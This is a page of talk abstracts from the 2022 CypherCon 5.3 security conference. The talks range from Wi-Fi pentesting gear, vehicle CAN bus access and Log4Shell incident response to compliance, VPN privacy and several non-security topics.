Hackers of CypherCon

- Season 3

(2022)

Watch the opening ceremony with the CypherCon Team. Find out how the 2022 badges were made from the badge team. There are special guests and speakers you don't want to miss. Time to kick off CypherCon 5.3 in style.

Keeping up with regular compliance tasks can be draining and feel unrewarding, causing many to be overlooked or ignored. Ignoring these tasks can negatively affect our organizations and impact our job security. But if we don't ignore them, we risk falling behind on other obligations and getting burned out. Rather than ignore these tasks and risk burnout, we need to find the sources of compliance burdens and hack them. What makes a hacker is not a hoodie, it is finding ways to accomplish tasks using creative and effort reducing methods. Hacking is not limited to the ...

Good security gets out of the way of users while getting in the way of adversaries. Passwords fail on both accounts. What holds us back from getting rid of passwords? Trust. In this session, we will propose a framework of technical controls to ensure only trusted sessions authenticate, regardless of faults or failures in any one factor. We will share a path forward for increasing trust in passwordless authentication.

Wi-Fi Bustin' makes me feel good. This talk will showcase the first of its kind 'Pwnton Pack', a Ghostbuster's inspired take on a wireless penetration testing. Featuring hardware hacking, microcontrollers and wireless attack arsenals bundled into a unique package; come learn why such a pack exists and fun details around the build experience. This talk is meant to inspire newcomers to InfoSec, Arduino devices and provide a fun take on existing methodologies and toolsets. For your Wi-Fi security needs; Who you gonna' call?.

Sadly, climate change is progressing rapidly and is likely to be the greatest public health threat of this century according to the Lancet Commission on Climate Change and Health. Human emissions of greenhouse gas have already caused Earth's average temperature to rise by 1.8°F. This summer during the hottest June ever recorded, the hottest temperature ever recorded by scientific instruments occurred in Furnace Creek, Death Valley, California where the temperature was 130°F. During the same heat wave, Lytton, B.C., Canada recorded the hottest temperature ever in ...

We've reached a tipping point with more apps being delivered from cloud services than from on-premises. OAuth 2.0 and OpenID Connect (OIDC) have become essential in federating access and handling strong authentication. But these are frameworks not standards, and these frameworks are based on dozens of RFCs. This has resulted in numerous approaches, confusing developers and security teams alike. In this presentation, participants will learn how to secure implementations.

An in-depth panel with the creators of this years unique CypherCon 5.3 electronic badge. They take questions from the audience, Discord and Twitter. Learn about the "behind the scenes" of hacker badge creation.

As a defender, I'm often asked "Is this message legitimate?" As attackers become more clever, determining the legitimacy of email messages can be a real challenge. This talk will examine e-mail headers and how to determine legitimate messages from those that could lead to fraud or identity theft.

Most organizations don't have enough budget to buy every tool nor hire every person they need. They also don't realize there are plenty of free tools, tactics and procedures available to the Blue Team. Here's a collection of tips and tricks learned from security professionals around the world about what you can do today to level up your People, Processes, and Technology - at little to no cost. You'll walk away with actionable tips to fill your security gaps and help reduce your attack surface.

This talk will explore the use of the Sonic Pi live coding environment as a means of using code to create music, as well as to provide an accessible gateway into more complex coding environments and applications.

Vehicle Manufacturers are slowly limiting access to easy connection points in vehicles. I'll walk you through how we at CanBusHack bypass vehicle gateway controllers by physically connecting to easy-to-reach access points. What information might be obtained at these areas. Also, give you some tools of the trade and that won't damage your car (or more importantly your spouse's car).

Even though the Cold War ended almost 30 years ago, there are still a lot of valuable lessons that can be learned from that era. One of the hallmarks of Civil Defense was to prepare yourself and your family for the coming Nuclear War. There were thousands of pamphlets, ads and movies created to teach people how to survive and thrive when Mutually Assured Destruction came to fruition. In this presentation, I will go over some of the more famous Civil Defense campaigns of the Cold War and how you can apply these tips to keep yourself and your companies safe in the ...

By definition, hackers make things work in unexpected and unintended ways. To many outside this community, hacking seems like a destructive process. However, anyone that has ever created or utilized an exploit in an imaginative way knows that, at its heart, hacking is all about making something new. This talk, full of technical examples taken from opposing disciplines in information security, shows how healthy competition between makers and breakers drives progress.

While we worked from home during COVID, a massive international crypto project exploded in WI that allowed people to put up IoT and now Cellular service from their homes and businesses. From what started as practically nothing in 2020 now has over 250,000 of these hotspots deployed in public as of October 2021 carrying production traffic for large companies such as Lime for Scooters, Salesforce, and even Victor Mouse Traps. As this project continues to grow using unlicensed spectrum such as CBRS on FCC certified equipment, I predict what we will see in the decade ...

This talk will explore the tools, risks, and rewards of automating the worst parts of your workday. This talk is for anybody who wants to reap low-hanging fruit in their tech stack and get some quick scripting wins.

The enemy of Digital Marketing is friction and IT Security creates lots of friction. Marketers are not just fighting their own IT Departments, they're fighting all of them. In this talk, Joe Cicero, Sr. Security Engineer, will discuss "Friction Red Flags" that Marketers unknowingly create and that he sees every day. If you are in IT Security and you deal with your Marketing department, this talk will help you develop a checklist to have more friction-less digital materials.

Ransomware is a financially motivated crime. The goal is to inhibit business systems in order to extract a payment. Historically, there's been plenty of financial gain from ransoming data as it resides in traditional onPrem systems. So the question is, will there be evolutionary pressure on attackers - forcing them to evolve tactics? In this talk, Kat will be demo-ing strategies threat actors might employ to affect availability of business data in the cloud.

H.T.T.P. Headers are an often overlooked, though very powerful way to improve the security of your application. We'll take a look at what headers can be used to find vulnerabilities in your site, look at some examples I've seen while scanning thousands of sites, and demo a live scan of a site.

The best incident response planning and preparation can be quickly derailed by an anxious executive seeking catharsis. Important characteristics of an effective incident response - such as discipline, organization, and foresight - all depend on an organization's ability to avoid panic. Once panic sets in, our attention must focus on protecting response procedures from thrashing and poor judgment. For security teams and scuba divers, it's not enough to know how to escape immediate danger. We must also learn to maintain workable risk levels by keeping others calm and ...

The single best way Humans transfer knowledge is through stories. We are a social species and there are no better stories than Star Trek episodes. Nearly every episode of Star Trek involves some sort of security incident. Everything from someone stealing data (or Data), insider threats, APT, malware, and more. There is a lot of content we can use as examples to help teach and learn.

We all have our favorite vendors and have those vendors we love to hate. Many places like trying to homogenize on a specific vendor or technology. What happens if you put all your eggs in one security vendor basket? Is it worth doing that? Does not knowing how a vendor's Machine Learning makes decisions hurt or help us? Let us travel down a real-world scenario as to why using multiple vendors and multiple threat feeds could be advantageous. Wait, is that Defense in Depth? Maybe it is, but not in a way you normally think of.

Security is often not funded because risk costs, as evaluated by an organization for its own benefit, has a ROI that is below other possible investments. However, there are multiple benefits of evaluating risk from an ethical perspective. This presentation proposes a maturity model for the ethics of risk, based on an evaluation of research related to ethical risk. The framework describes risk, management, legal, and engineering concerns appropriate to risk analysts, security staff, or software engineering professionals. The framework provides a list of actionable ...

You are savvy enough to have a virtual private network aka VPN. Maybe you did a bit of research and bought one that lets you be "anonymous" and lets you stream your favorite streaming service from anywhere while you travel. How well do you trust your VPN provider? Have you considered that your VPN provider could be doing things you didn't expect? Consumer VPNs, free VPNs, even VPNs that pay you. We will dig into what some VPN providers are doing. We analyzed hundreds of VPNs and their services to give you a deeper understanding of what actually is happening behind the...

We've all been there. You visit your favorite website only to be harassed by the virtual assistant. Being asked the same questions, in the same way...Over and Over. Never really getting the answers you need, or the direction required to move forward. This brings us to the power of AIML Driven Virtual Assistants. In this session I will introduce the concept of Conversational Driven Design and how to use open-source solutions to add "Intelligent" bots to your environment. We will review current options, security implications of AIML driven virtual assistants, and build ...

Numerous data governance laws and policies have been enacted to protect user privacy. Polices may define data retention (how long the data must be kept), data purging requirements (when the data must be destroyed), and data consent (whether the data can be used for a particular purpose). To comply with these requirements and to minimize liability, database systems (e.g., Oracle, Postgres) must offer built-in support to enforce storage and use policies. Instead, such compliance is currently achieved through a patchwork of manual solutions within each organization. In ...

There are dozens of great talks that will show you why you should be get a job in a cool info-sec niche, with spectacular selling points. Every job has downsides and challenging days, though, especially for specific personalities and learning styles. This talk digs into nine cool info-sec roles, then suggests why you might enjoy or dislike working in them based on the elements that aren't camera worthy or talked about gleefully. There's a cyber security job out there for everyone, and it's important to find the one that makes you happy and successful.

Meditation is becoming a buzz-word for "beating" stress but seems very complicated to learn. We will show how DIY (Do It Yourself) brain technology projects such as DIY EEG (electroencephalogram) and TDCS (Transcranial direct current stimulation) can actually work as training wheels for a relaxed and energized mind. Transcranial direct current stimulation (tDCS), is a non-invasive, painless brain stimulation treatment that uses direct electrical currents to stimulate specific parts of the brain. A constant, low intensity current is passed through two electrodes placed...

In the lead-up to the 2020 US Presidential election, there were a lot of concerns from security professionals about the potential role that Deepfake media could play in shaping voter opinions. While these concerns were not unfounded, in the end there were no notable instances of deep-fakes being used to manipulate the election. Why not? What is the current status of Deepfake technology? Where are we headed next? Hacker and Security evangelist Alyssa Miller will answer these questions and talk about how the threat landscape will continue to evolve as we head into the ...

Blue Team Security is the hardest job in Information Security. It is not sexy, and it is always complicated to navigate between the people, processes, and technology of the organization. Why do companies, .govs and ONG's have breaches? Thinking they are solving problems with technology. This talk will cover Tactics, Techniques and Procedures that blue teams can use based from lessons learned from insurgents and counter-insurgent operations in history.

The last 50 years have witnessed the practical extinction of the natural nighttime environment from most of the inhabited places on our planet. The majority of people can no longer see the stars in the sky overhead at night from where they live. The reason? Light pollution; an incredible glut of wasted energy that we create, every second of every night, in levels that increase from year to year. The negative effects of light pollution (LP) reach far beyond that of having robbed us of our views of the universe. While awareness of this issue has grown, not much has been...

The NIST Cybersecurity Framework ("CSF") from the "National Institute of Standards and Technology" provides organizations with a set of documented policies and procedures designed to help private companies "Identify, Protect, Detect, Respond and Recover" from cybersecurity incidents. It is widely recognized as industry best practice and the most comprehensive, in-depth set of controls of any framework. Let's discuss this framework.

Network defenders are accustomed to watching for malicious activity from the public internet as well as their own local network. What happens when an attack doesn't come from a typical avenue? This talk will dive into wireless attacks, defenses, and an unconventional multi-factor authentication bypass.

As your company winds down for the holiday season, like clockwork, another fresh CVE with publicly available exploit code drops. The Apache Log4j exploit (CVE-2021-44832), also dubbed as Log4Shell, had widespread fallout as a result of the exploit being made publicly available, and organizations are still dealing with the associated problems even months later. This talk will discuss three unique scenarios observed as a result of Log4j being exploited on VMWare Horizon servers and include 1) exploitation for persistent access via a webshell, 2) exploitation leading to ...

Long before it became an infosec capture-the-flag staple, steganography had its birth in the Steganographia of Johannes Trithemius, an early 16th century book of magic and secret writing. Though it remains perhaps the most widely known, this is but one among countless examples of cryptography from the Renaissance and early modern eras used by alchemists, magicians, and dissidents to conceal their hidden knowledge from the prying eyes of the uninitiated. By applying the lens of cyber threat intelligence to the Steganographia and other examples of Renaissance and early ...

Daniel Creed has been an information security professional for more than 20 years, now working at a place shifting left at scale, 8 million servers, 200+Tbps and growing. Throughout his career he has worked across numerous sectors of private, governmental, and educational industries, performed thousands of advanced penetration tests, build and lead high performance red/purple/blue teams, and worked in every functional discipline within the information security landscape. In addition to numerous industry certifications, Daniel has a B.S. Cybersecurity and Information ...

Virtual Reality (VR), Augmented Reality (AR) and Mixed Reality (MR) together are now referred to as XR or Extended Reality... In 2022 XR devices already easily exceed over 10 MILLION XR headsets in both consumer and corporation user's hands today. From the Meta Quest 2 to the Microsoft Hololens 2, XR is changing how WE experience our own Reality. But what can go wrong? What about privacy concerns? Are every one of our gestures being recorded? Have you ever gotten VR sick? How can we trick our brains in beneficial ways? Together we'll assess the following XR topic: ...

The FINAL presentation of CypherCon 5.3 is closing ceremony featuring Michael Goetzman and the CypherCon Team.